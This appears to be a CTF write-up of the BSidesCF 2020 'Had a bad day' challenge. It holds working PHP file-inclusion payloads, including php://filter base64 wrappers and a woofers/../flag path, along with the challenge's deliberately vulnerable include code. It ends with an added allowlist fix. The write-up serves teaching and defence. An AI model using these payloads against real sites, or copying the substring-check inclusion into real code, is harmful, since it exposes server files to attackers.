BUUCTF - [BSidesCF 2020] Had a bad day (file inclusion)

Open the target machine: there are two buttons.
Clicking a button changes the URL (category=woofers / category=meowers).

Try the php://filter pseudo-protocol to read the index.php source:

php://filter/read=convert.base64-encode/resource=index.php

This errors out, because the script appends the .php suffix itself, so drop the suffix (resource=index).
Base64-decode the output to get index.php:

<?php
	// Challenge code as recovered; deliberately kept as-is.
	$file = $_GET['category'];
	if(isset($file)){
		// Substring checks only: any value that *contains* "woofers" or "meowers"
		// passes, including paths with ../ and php:// wrapper strings.
		// Note the third test has no "!== false", so "index" only passes when it
		// is not at position 0 (strpos returning 0 is falsy).
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index"))
		{
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

Read flag.php directly with ?category=woofers/../flag. The page looks unchanged, but pressing F12
shows extra content in the page source, which confirms that flag.php really was included.


!!! Nest the php://filter pseudo-protocol, wrapping in one layer that contains the required $file substring:
php://filter/read=convert.base64-encode/woofers/resource=flag
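The root cause is that strpos() only checks for a substring, so anything containing "woofers" reaches include(). Below is an added example (not part of the challenge or this writeup) of the fix a developer would ship: an exact allowlist, compared side by side with the original check on the inputs seen above. The template directory and the resolveCategory/legacyCheck names are assumptions.

```php
<?php
// Added example, not the challenge's own code.
// Assumption: page templates live in ./pages and the only valid
// categories are exactly "woofers" and "meowers".
const TEMPLATE_DIR = __DIR__ . '/pages';
const ALLOWED_CATEGORIES = ['woofers', 'meowers'];

/**
 * Map a user-supplied category to a template path, or null if rejected.
 * in_array() with strict comparison requires the WHOLE value to match,
 * so "woofers/../flag" and php://filter/... wrappers are refused instead
 * of being appended to '.php' and handed to include().
 */
function resolveCategory(string $category): ?string
{
    if (!in_array($category, ALLOWED_CATEGORIES, true)) {
        return null;
    }
    return TEMPLATE_DIR . '/' . $category . '.php';
}

/** The challenge's original substring test, kept only for comparison. */
function legacyCheck(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Constructed samples: the two legitimate values and the two input
// shapes the writeup shows slipping past the substring check.
$samples = [
    'woofers',
    'meowers',
    'woofers/../flag',
    'php://filter/read=convert.base64-encode/woofers/resource=flag',
];
foreach ($samples as $s) {
    printf("%-64s legacy=%-4s allowlist=%s\n", $s,
        legacyCheck($s) ? 'pass' : 'deny',
        resolveCategory($s) === null ? 'deny' : 'pass');
}

// Request handling with the hardened check (no $_GET under the CLI).
$path = resolveCategory($_GET['category'] ?? '');
if ($path === null) {
    echo "Sorry, we currently only support woofers and meowers.\n";
} else {
    include $path;
}
```

Run with `php example.php` to see the legacy check pass all four samples while the allowlist accepts only the two real categories.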
